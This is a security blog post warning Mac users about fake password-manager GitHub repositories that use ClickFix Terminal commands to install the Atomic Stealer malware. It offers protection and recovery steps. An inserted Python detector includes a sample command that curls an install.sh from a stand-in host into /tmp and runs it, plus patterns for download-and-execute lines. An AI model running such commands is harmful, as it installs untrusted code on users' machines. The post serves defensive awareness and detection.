
Fake Password Managers Target Mac Users with Malware

Written by Adrian León | Sep 23, 2025 1:15:00 PM

When looking for a reliable tool to protect your passwords, the last thing you expect is to fall into a trap designed to steal your data. But that’s exactly what’s happening. LastPass has issued a warning about a new campaign targeting macOS users, where cybercriminals impersonate password managers and other popular programs to spread malware.

At TecnetOne, we’ll explain how this threat works, which software is being faked, and what steps you can take to avoid becoming a victim.

 

What’s Happening with Fake Password Managers?

 

Attackers are creating fraudulent GitHub repositories that look official. The repositories claim to host well-known apps, but what they actually deliver is malware called Atomic Stealer (AMOS).

This malicious tool is part of a Malware-as-a-Service (MaaS) operation, available on underground forums for $1,000/month. Its main goal is to steal sensitive data from infected machines—including login credentials, cookies, browsing history, and even cryptocurrency wallet details.

The campaign uses search engine optimization (SEO) techniques to push these fake repositories to the top of Google or Bing results, increasing the chances of luring victims.

 

Malicious Google Search result (Source: LastPass)

 

How the Attack Works

 

The attack follows a method known as ClickFix, where users are tricked into running a command in macOS Terminal without understanding its consequences.

Here’s how it happens:

 

  1. You search for software like LastPass, 1Password, or Notion on Google.
  2. A top result leads you to a legit-looking GitHub repository.
  3. The page includes a “Download” button.
  4. That button redirects to a separate website with Terminal instructions.
  5. You’re told to copy-paste a command into Terminal.

 

That command silently uses curl to download a malicious install.sh file into your /tmp folder. Once executed, AMOS installs itself and starts exfiltrating your data.
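A defender-side check for the pattern described above, as an added example that is not from the original post or from LastPass's report: it parses one pasted command line and reports whether it downloads a script into a temporary directory and then runs it. It goes beyond the page's curl-to-/tmp case to two closely related forms (a downloader piped into a shell, and a shell run on a command substitution); the function names, finding labels and the example.invalid sample are assumptions made for illustration.

```python
import re
import shlex

FETCHERS = {"curl", "wget"}
RUNNERS = {"sh", "bash", "zsh", "source", "."}
OPERATORS = {"&&", "||", ";", "|", "&"}
TMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/")
# A shell told to run whatever a downloader prints: sh -c "$(curl ...)".
SUBSHELL_EXEC = re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b")
# Constructed sample; example.invalid is a reserved name that never resolves.
SAMPLE = ("curl -fsSL https://example.invalid/install.sh -o /tmp/install.sh"
          " && bash /tmp/install.sh")

def stages(command):
    """Split a command line into (preceding operator, argv) simple commands."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split, lex.commenters = True, ""
    out, op, argv = [], None, []
    for tok in list(lex) + [";"]:
        if tok in OPERATORS:
            if argv:
                out.append((op, argv))
            op, argv = tok, []
        elif tok != "sudo" or argv:  # drop a leading sudo, keep everything else
            argv.append(tok)
    return out

def dropped_path(argv):
    """Return the temp-directory path a downloader stage writes to, if any."""
    for flag, value in zip(argv, argv[1:]):
        writes = flag in {"--output", ">", ">>"} or re.fullmatch(r"-[A-Za-z]*[oO]", flag)
        if writes and value.startswith(TMP_DIRS):
            return value
    return None

def clickfix_findings(command):
    """Name the download-and-execute patterns found in one pasted command line."""
    found = {"subshell_exec"} if SUBSHELL_EXEC.search(command) else set()
    dropped, prev_head = set(), ""
    for op, argv in stages(command):
        head = argv[0].rsplit("/", 1)[-1]  # /bin/bash -> bash
        if op == "|" and prev_head in FETCHERS and head in RUNNERS:
            found.add("pipe_to_shell")
        if (head in RUNNERS and dropped & set(argv)) or argv[0] in dropped:
            found.add("tmp_drop_and_run")
        if head in FETCHERS and dropped_path(argv):
            dropped.add(dropped_path(argv))
        prev_head = head
    return sorted(found)
```

`clickfix_findings(SAMPLE)` returns `['tmp_drop_and_run']`; an empty list means none of the three patterns matched, not that the command is safe to run.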

 


 

Software and Services Being Imitated

 

The campaign doesn’t stop at LastPass. According to the report, attackers have created fake versions of over 100 applications, including:

 

  1. Password managers like 1Password
  2. Cloud and collaboration platforms: Dropbox, Notion, Confluence
  3. Financial apps: Robinhood, Fidelity, Gemini
  4. Creative tools: Adobe After Effects, Audacity
  5. Email clients: Thunderbird
  6. Even cybersecurity solutions like SentinelOne

 

Everything appears legitimate—GitHub pages, branding, and installation instructions—all designed to build trust.

 

GitHub repository claiming affiliation with LastPass (Source: LastPass)

 

Why AMOS Is So Dangerous

 

While Atomic Stealer was already known in cybersecurity circles, its developers recently added a persistent backdoor—making it even more dangerous.

Not only does it steal your data, but it also gives attackers ongoing, stealthy access to your Mac. They can install more malware or use your device as a launchpad for broader attacks.

 


Page hosting the ClickFix instructions (Source: LastPass)

 

Similar Campaigns in the Past

 

ClickFix-style attacks on macOS aren't new. Past campaigns used fake ads to promote bogus solutions to system errors or impersonated legitimate brands like Booking.com.

What makes this campaign stand out is its scale and execution: over 100 programs spoofed and a well-executed SEO strategy to reach thousands of users.

 


 

How to Protect Yourself

 

At TecnetOne, we always stress: prevention is your first line of defense. Here’s what you can do:

 

  1. Download only from official websites. If you're looking for an app, go straight to the vendor’s site. Don’t trust top search results blindly.
  2. Never run Terminal commands you don’t fully understand.
  3. Verify GitHub repositories. Look for signs of authenticity like verified accounts, contributor history, and follower count.
  4. Keep your Mac up to date with the latest macOS and app security patches.
  5. Use a reputable security solution. At TecnetOne, we partner with trusted vendors to detect suspicious behavior and data exfiltration.
  6. Enable two-factor authentication (2FA). If your credentials are stolen, this second layer could stop an attacker in their tracks.

 

What to Do If You Think You’re Infected

 

If you ever copied a Terminal command from a suspicious GitHub page, here’s what to do:

 

  1. Immediately disconnect your Mac from the internet.
  2. Run a malware scan with a trusted security tool.
  3. Change all your passwords using another clean device.
  4. Monitor your banking and crypto accounts for suspicious activity.
  5. Consider a clean reinstall of macOS, especially if a persistent backdoor is suspected.

 

Final Thoughts

 

Cybercriminals are getting more creative and opportunistic. This campaign combines SEO manipulation, fake GitHub repositories, and Terminal-based installation—making it easy to fall for if you're not cautious.

At TecnetOne, we believe the best defense is digital awareness: learn to spot red flags, verify sources, and never run what you don’t understand.

The campaign impersonating LastPass (and more than 100 other apps) is a clear reminder that even Mac users aren’t immune. The idea that macOS is “safe by default” no longer holds up.

Cybersecurity isn’t about fear—it’s about smart prevention. If you follow best practices, you can enjoy the full power of your Mac without becoming an easy target.